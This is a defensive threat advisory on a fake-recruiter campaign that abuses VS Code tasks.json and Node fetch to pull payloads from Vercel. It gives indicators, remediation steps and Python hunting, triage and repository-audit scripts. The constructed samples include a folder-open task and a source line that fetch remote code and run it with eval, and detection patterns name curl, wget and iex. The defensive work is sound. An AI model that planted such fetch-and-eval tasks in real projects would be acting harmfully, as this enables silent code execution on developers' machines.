Technical Analysis & Remediations
MITRE ATT&CK Mapping
T1566.002 - Phishing: Spearphishing Link
T1204.001 - User Execution: Malicious Link
T1059.001 - Command and Scripting Interpreter: PowerShell
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1059.005 - Command and Scripting Interpreter: Visual Basic
CVE Profile
N/A [Social Engineering / Living-off-the-Land (LotL)]
CISA KEV Status: Not applicable (no CVE assigned)
Telemetry
Domains
talentacq[.]pro
publicshare[.]org
astrabytesyncs[.]com
IP Addresses
95.169.180[.]140
144.172.93[.]88
Files & Hashes
VBScript start.vbs (SHA256: 5e307ef3aa9f20d963382700173530cdc455c1523631bbe22ede3710a2a30373)
Python payload nvidia.py (SHA256: 1b42fc77155bd78b098e0b72440dd72d6154312569e6ba46f1e5dc94b31c6b42)
Renamed Python binary "csshost[.]exe" (no hash listed)
Constraint
The structure of the malicious GitHub repositories shows deliberate abuse of ordinary developer workflows: the Node.js fetch API and Visual Studio Code .vscode/tasks.json task definitions are used to pull second-stage payloads from Vercel staging deployments as a side effect of the developer's normal project setup, so the victim never sees a separate download step.
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)
GOVERN (GV) – Crisis Management & Oversight
Command
Issue a mandatory communication to all development and engineering teams on the operational risk of fake recruiter engagements and of executing code from untrusted GitHub repositories.
DETECT (DE) – Monitoring & Analysis
Command
Deploy EDR hunting queries for wscript.exe, cmd.exe or powershell.exe launched with a working directory or script path under %TEMP%, and raise the severity when the command line also extracts an archive there (the PowerShell Expand-Archive cmdlet or tar.exe).
Command
Implement SIEM alerts for unusual process behaviour on developer workstations: node.exe initiating outbound connections to vercel.app subdomains, and unexpected parent-child chains such as wscript.exe spawning cmd.exe or powershell.exe.
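The two DETECT items above expressed as hunting logic and run over constructed sample telemetry. This is an added example, not code from the Sophos report or from any EDR vendor: the event field names (type, image, parent_image, cwd, command_line, dest_host) are an assumption standing in for a normalised process-creation and network-connection feed, and the third rule (a shell spawned by wscript.exe or node.exe) is an analyst's addition that follows from the VBScript, cmd and PowerShell chain mapped at the top of the page.

```python
"""Hunting rules for the DETECT track, run over constructed sample telemetry.

Added example, not code from the Sophos report or any EDR vendor. The flat
event dicts stand in for normalised process-creation and network-connection
events; the field names are an assumption, not a vendor schema.
"""
import re
from typing import Dict, List, Optional

Event = Dict[str, str]
Finding = Dict[str, str]

# Script hosts and shells named on the page; cscript.exe is wscript.exe's console twin.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SUSPECT_PARENTS = {"wscript.exe", "cscript.exe", "node.exe"}  # should not be spawning shells
# A user's %TEMP% resolves under AppData\Local\Temp, SYSTEM's under Windows\Temp;
# this matches resolved paths, so expand %TEMP% in the telemetry first.
TEMP_RE = re.compile(r"\\(?:appdata\\local\\temp|windows\\temp)(?:\\|$)", re.I)
# Expand-Archive is a PowerShell cmdlet; tar.exe ships with Windows 10 and later.
ARCHIVE_RE = re.compile(r"\bexpand-archive\b|(?:^|[\s\"'])tar(?:\.exe)?\s", re.I)
VERCEL_RE = re.compile(r"(?:^|\.)vercel\.app$", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_script_host_in_temp(ev: Event) -> Optional[Finding]:
    """Script host or shell working in %TEMP% or running a script from it;
    high severity when the command line also extracts an archive."""
    if ev.get("type") != "process_start" or _basename(ev["image"]) not in SCRIPT_HOSTS:
        return None
    cmdline = ev.get("command_line", "")
    if not (TEMP_RE.search(ev.get("cwd", "")) or TEMP_RE.search(cmdline)):
        return None
    severity = "high" if ARCHIVE_RE.search(cmdline) else "medium"
    return {"rule": "script_host_in_temp", "severity": severity,
            "image": ev["image"], "command_line": cmdline}


def rule_shell_spawned_by_interpreter(ev: Event) -> Optional[Finding]:
    """cmd.exe or powershell.exe whose parent is wscript.exe or node.exe."""
    if ev.get("type") != "process_start" or _basename(ev["image"]) not in SHELLS:
        return None
    parent = ev.get("parent_image", "")
    if _basename(parent) not in SUSPECT_PARENTS:
        return None
    return {"rule": "shell_spawned_by_interpreter", "severity": "high",
            "image": ev["image"], "parent_image": parent}


def rule_node_to_vercel(ev: Event) -> Optional[Finding]:
    """node.exe opening an outbound connection to vercel.app or a subdomain of it."""
    if ev.get("type") != "network_connect" or _basename(ev["image"]) != "node.exe":
        return None
    host = ev.get("dest_host", "")
    if not VERCEL_RE.search(host):
        return None
    return {"rule": "node_to_vercel", "severity": "medium", "image": ev["image"], "dest_host": host}


RULES = (rule_script_host_in_temp, rule_shell_spawned_by_interpreter, rule_node_to_vercel)


def hunt(events: List[Event]) -> List[Finding]:
    """Apply every rule to every event; one finding per (event, rule) match."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is not None:
                findings.append(hit)
    return findings


SAMPLE_EVENTS: List[Event] = [  # constructed, not captured telemetry
    # 1. start.vbs launched from the user's temp folder
    {"type": "process_start", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cwd": r"C:\Users\dev\AppData\Local\Temp",
     "command_line": r'wscript.exe "C:\Users\dev\AppData\Local\Temp\start.vbs"'},
    # 2. the script spawns cmd.exe, which unpacks an archive with tar.exe
    {"type": "process_start", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe", "cwd": r"C:\Users\dev",
     "command_line": r"cmd.exe /c tar -xf C:\Users\dev\AppData\Local\Temp\nv.tgz -C C:\Users\dev\AppData\Local\Temp"},
    # 3. PowerShell variant of the same extraction
    {"type": "process_start", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cwd": r"C:\Users\dev",
     "command_line": r'powershell.exe -NoProfile -Command "Expand-Archive -Path C:\Users\dev\AppData\Local\Temp\nvidia.zip -DestinationPath C:\Users\dev\AppData\Local\Temp\nvidia"'},
    # 4. node.exe pulling a second stage from a Vercel deployment
    {"type": "network_connect", "image": r"C:\Program Files\nodejs\node.exe",
     "dest_host": "staging-assets-example.vercel.app", "dest_port": "443"},
    # 5-6. benign noise: npm registry traffic and a build task launched by the IDE
    {"type": "network_connect", "image": r"C:\Program Files\nodejs\node.exe",
     "dest_host": "registry.npmjs.org", "dest_port": "443"},
    {"type": "process_start", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cwd": r"C:\Users\dev\projects\app", "command_line": r"powershell.exe -File .\build.ps1"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], f.get("command_line") or f.get("parent_image") or f.get("dest_host"))
```

Against the six sample events the rules raise five findings: the first three process events trip the %TEMP% rule (medium for the bare wscript.exe launch, high for the two extractions), the cmd.exe child of wscript.exe also trips the parent-child rule, and the node.exe connection to the vercel.app subdomain trips the third; the npm registry traffic and the IDE-launched build task produce nothing. The %TEMP% regex matches resolved paths, so telemetry that records the literal %TEMP% variable needs expanding first.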
RESPOND (RS) – Mitigation & Containment
Command
Isolate any endpoint displaying network telemetry destined for the known C2 IP addresses (95.169.180[.]140, 144.172.93[.]88).
Command
Terminate anomalous Python processes executing from non-standard directories, especially if named csshost[.]exe.
RECOVER (RC) – Restoration & Trust
Command
Before rejoining a compromised developer workstation to the domain, validate its integrity through full forensic analysis, including browser extension data and cryptocurrency wallet files.
IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
Command
Restrict the execution of VBScript (.vbs) files via Group Policy (GPO) for standard users.
Command
Enforce application control (e.g., AppLocker or WDAC) to block execution of unapproved Python binaries dropped into user-writable directories such as %TEMP%.
Remediation - THE HOME USER TRACK (Safety Focus)
Priority 1: Safety
Command
Disconnect from the internet immediately if you have pasted and executed terminal commands prompted by a "verification" or "error" page during a job interview process.
Command
Do not log into banking, cryptocurrency wallets, or primary email accounts on the affected system until verified clean.
Priority 2: Identity
Command
Reset all critical passwords and rotate MFA tokens using a known clean device (e.g., your mobile phone on a cellular 5G network), prioritizing cryptocurrency exchange and GitHub credentials.
Priority 3: Persistence
Command
Check scheduled tasks, startup folders, and Chrome/Edge browser extensions for unrecognized additions that may facilitate data exfiltration or persistent RAT access.
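The Priority 3 check above as a script, added here and not part of the Sophos report. The three scans take their locations as parameters so they run offline against constructed data (a fake Startup folder, two fake extension manifests, and a two-task schtasks CSV using a subset of the real columns); the WINDOWS_STARTUP_DIRS and WINDOWS_PROFILE_DIRS constants hold the default Windows locations to pass in on a real machine, and the allowlist of known extension IDs is something the user supplies from their own install history.

```python
"""Persistence triage for the home-user track: Startup folders, Chrome/Edge
extension manifests and scheduled tasks. Added example, not from the Sophos
report. Inputs are parameters so the checks run offline on constructed data;
WINDOWS_STARTUP_DIRS / WINDOWS_PROFILE_DIRS are the real defaults for a live host."""
import csv
import io
import json
import os
import re
import tempfile
from typing import Iterable, List

WINDOWS_STARTUP_DIRS = [r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup",
                        r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp"]
WINDOWS_PROFILE_DIRS = [r"%LOCALAPPDATA%\Google\Chrome\User Data\Default",
                        r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default"]
SCRIPT_EXT = (".vbs", ".js", ".jse", ".wsf", ".hta", ".cmd", ".bat", ".ps1", ".lnk", ".exe")
# Script hosts, shells, Python/csshost from the page, and Temp paths, in a task's action.
SUSPECT_TASK_RE = re.compile(
    r"wscript|cscript|powershell|cmd\.exe|python|csshost|\\appdata\\local\\temp\\|\\windows\\temp\\", re.I)
# Permissions that read every page, reach a local binary or the clipboard: what exfiltration needs.
RISKY_PERMS = {"<all_urls>", "webRequest", "webRequestBlocking", "nativeMessaging",
               "clipboardRead", "debugger", "cookies"}
EXT_ID_RE = re.compile(r"^[a-p]{32}$")  # Chrome/Edge extension IDs: 32 chars of a-p


def scan_startup_folders(dirs: Iterable[str]) -> List[str]:
    """Everything in a Startup folder runs at logon; list script-like entries for review."""
    findings = []
    for d in map(os.path.expandvars, dirs):
        if os.path.isdir(d):
            findings += [f"startup: {os.path.join(d, n)}" for n in sorted(os.listdir(d))
                         if n.lower().endswith(SCRIPT_EXT)]
    return findings


def scan_extensions(profile_dirs: Iterable[str], known_ids: Iterable[str]) -> List[str]:
    """Walk <profile>/Extensions/<id>/<version>/manifest.json; report extensions not on
    the user's own allowlist and any holding RISKY_PERMS."""
    known, findings = set(known_ids), []
    for profile in profile_dirs:
        ext_root = os.path.join(os.path.expandvars(profile), "Extensions")
        if not os.path.isdir(ext_root):
            continue
        for ext_id in sorted(filter(EXT_ID_RE.match, os.listdir(ext_root))):
            for version in sorted(os.listdir(os.path.join(ext_root, ext_id))):
                manifest = os.path.join(ext_root, ext_id, version, "manifest.json")
                if not os.path.isfile(manifest):
                    continue
                with open(manifest, encoding="utf-8") as f:
                    m = json.load(f)
                perms = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
                risky = sorted(perms & RISKY_PERMS)
                if ext_id not in known or risky:
                    note = "" if ext_id in known else " not in allowlist;"
                    findings.append(f"extension {ext_id} '{m.get('name', '?')}' {version}:"
                                    f"{note} risky permissions {risky}")
    return findings


def scan_schtasks_csv(text: str) -> List[str]:
    """Parse `schtasks /Query /FO CSV /V` output; flag tasks whose action matches SUSPECT_TASK_RE."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        if row.get("TaskName") == "TaskName":  # verbose output repeats the header row
            continue
        if SUSPECT_TASK_RE.search(row.get("Task To Run", "")):
            findings.append(f"task {row['TaskName']}: {row['Task To Run']}")
    return findings


# Constructed sample (not captured data); a subset of schtasks' real columns.
SAMPLE_SCHTASKS_CSV = (
    '"HostName","TaskName","Status","Author","Task To Run"\r\n'
    '"DEV-PC","\\NvidiaUpdate","Ready","DEV-PC\\dev","wscript.exe C:\\Users\\dev\\AppData\\Local\\Temp\\start.vbs"\r\n'
    '"HostName","TaskName","Status","Author","Task To Run"\r\n'
    '"DEV-PC","\\Vendor\\Updater","Ready","Vendor","C:\\Program Files\\Vendor\\updater.exe"\r\n')
SAMPLE_MANIFESTS = {  # constructed; only the second ID is on the allowlist used in demo()
    "abcdefghijklmnopabcdefghijklmnop": {"name": "Wallet Helper", "manifest_version": 3,
                                         "permissions": ["tabs", "nativeMessaging"],
                                         "host_permissions": ["<all_urls>"]},
    "ponmlkjihgfedcbaponmlkjihgfedcba": {"name": "Theme Tweaker", "manifest_version": 3,
                                         "permissions": ["storage"]},
}


def build_sample(root: str) -> None:
    startup = os.path.join(root, "Startup")
    os.makedirs(startup)
    for name in ("Teams.lnk", "update.vbs", "desktop.ini"):
        open(os.path.join(startup, name), "w").close()
    for ext_id, manifest in SAMPLE_MANIFESTS.items():
        d = os.path.join(root, "Default", "Extensions", ext_id, "1.0.0")
        os.makedirs(d)
        with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as f:
            json.dump(manifest, f)


def demo() -> List[str]:
    root = tempfile.mkdtemp(prefix="triage-")
    build_sample(root)
    return (scan_startup_folders([os.path.join(root, "Startup")])
            + scan_extensions([os.path.join(root, "Default")], {"ponmlkjihgfedcbaponmlkjihgfedcba"})
            + scan_schtasks_csv(SAMPLE_SCHTASKS_CSV))


if __name__ == "__main__":  # on a live host pass WINDOWS_STARTUP_DIRS / WINDOWS_PROFILE_DIRS
    print("\n".join(demo()))
```

Run it on the affected machine as the affected user, feeding in the saved output of `schtasks /Query /FO CSV /V`. A .lnk in the Startup folder is normal for legitimate software, so the startup list is for review rather than an automatic verdict; the extension and task findings are the ones to act on first.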
Hardening & References
Baseline
CIS Microsoft Windows Desktop Benchmarks (Scripting and Application Control guidelines).
Framework
NIST CSF 2.0 / SP 800-61r3 (Incident Handling).
Hardening Directive
Developers must audit a cloned external repository's .env files and .vscode/tasks.json before building or running it, confirming that it contains no obfuscated curl/wget (or fetch) download commands and that any API keys present are ones the project legitimately owns.
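The repository-level check behind the Constraint note (fetch API and .vscode/tasks.json abuse) and the Hardening Directive above, as an added example; it is not code from the Sophos report or from any project it describes. It writes a constructed sample repository into a temporary directory and audits it; the keyword lists, the regexes, and the placeholder rule for .env values are the author's heuristics, and the JSONC stripping handles only the comment forms VS Code commonly emits.

```python
"""Pre-run audit of a cloned repository: auto-running .vscode/tasks.json tasks,
curl/wget/fetch one-liners aimed at vercel.app, and secrets shipped in .env.
Added example, not code from the Sophos report or from any project it describes.
The sample repository is constructed and the regexes are the author's heuristics."""
import json
import os
import re
import tempfile
from typing import List

DOWNLOADER_RE = re.compile(r"\b(curl|wget|fetch|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b", re.I)
VERCEL_URL_RE = re.compile(r"https?://[\w.-]*vercel\.app\b", re.I)
# base64 decode calls or a long base64-looking run (also hits long hashes: a prompt to read, not a verdict)
OBFUSCATION_RE = re.compile(r"\b(base64|atob|fromCharCode)\b|[A-Za-z0-9+/]{40,}={0,2}", re.I)
SECRET_NAME_RE = re.compile(r"KEY|TOKEN|SECRET|PASS|PRIVATE", re.I)
PLACEHOLDER_RE = re.compile(r"^(|\$\{[^}]*\}|<[^>]*>|your[-_].*|changeme|x{3,})$", re.I)
SOURCE_EXT = (".js", ".mjs", ".cjs", ".ts", ".ps1", ".sh", ".cmd", ".bat")


def _strip_jsonc(text: str) -> str:
    # tasks.json is JSONC: drop /* */ blocks, whole-line // comments and trailing commas
    # (// after content is left alone so URLs inside strings survive)
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)


def audit_tasks_json(text: str) -> List[str]:
    """runOn=folderOpen tasks fire when VS Code opens the folder (once automatic tasks
    are allowed for it); also flag tasks that download or run remote content."""
    findings = []
    for task in json.loads(_strip_jsonc(text)).get("tasks", []):
        label = task.get("label", "<unnamed>")
        cmd = " ".join(str(p) for p in [task.get("command", "")] + list(task.get("args", [])))
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append(f"task '{label}' runs automatically on folder open")
        if DOWNLOADER_RE.search(cmd) or VERCEL_URL_RE.search(cmd):
            findings.append(f"task '{label}' fetches remote content: {cmd[:80]}")
    return findings


def audit_source(text: str, rel: str) -> List[str]:
    """Flag lines requesting a vercel.app URL or pairing a downloader with obfuscation."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if VERCEL_URL_RE.search(line):
            findings.append(f"{rel}:{n}: requests a vercel.app URL")
        elif DOWNLOADER_RE.search(line) and OBFUSCATION_RE.search(line):
            findings.append(f"{rel}:{n}: downloader with an obfuscated argument")
    return findings


def audit_env(text: str) -> List[str]:
    """List secret-looking variables with real values; a repo should not ship credentials."""
    findings = []
    for line in text.splitlines():
        if "=" not in line or line.lstrip().startswith("#"):
            continue
        name, value = (part.strip().strip("'\"") for part in line.split("=", 1))
        if SECRET_NAME_RE.search(name) and not PLACEHOLDER_RE.match(value):
            findings.append(f".env sets {name} to a {len(value)}-char value")
    return findings


def audit_repo(root: str) -> List[str]:
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        for name in sorted(filenames):
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            with open(os.path.join(dirpath, name), encoding="utf-8", errors="replace") as f:
                text = f.read()
            if rel == ".vscode/tasks.json":
                findings += [f"{rel}: {m}" for m in audit_tasks_json(text)]
            elif name == ".env" or name.startswith(".env."):
                findings += audit_env(text)
            elif name.endswith(SOURCE_EXT):
                findings += audit_source(text, rel)
    return findings


SAMPLE_FILES = {  # constructed repository, not a real one
    ".vscode/tasks.json": """{
  // helper tasks
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    { "label": "prepare", "type": "shell", "command": "node", "runOptions": { "runOn": "folderOpen" },
      "args": ["-e", "fetch('https://staging-assets-example.vercel.app/init').then(r => r.text()).then(eval)"] }
  ]
}
""",
    "src/update.js": "fetch(atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv')).then(r => r.text()).then(eval);\n",
    ".env": "API_URL=http://localhost:3000\nSERVICE_API_KEY=sk-example-not-a-real-key-000000\nDB_PASSWORD=${DB_PASSWORD}\n",
}


def build_sample_repo() -> str:
    root = tempfile.mkdtemp(prefix="repo-audit-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    print("\n".join(audit_repo(build_sample_repo())))
```

On the sample repository the audit reports four items: the "prepare" task both auto-runs on folder open and fetches from a vercel.app URL, src/update.js pairs fetch() with a base64-decoded argument, and .env carries a populated SERVICE_API_KEY (the ${DB_PASSWORD} placeholder is ignored). Run `audit_repo` on the clone before `npm install`, before opening the folder in VS Code, and before running any task it defines.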
Source
Sophos X-Ops Original Report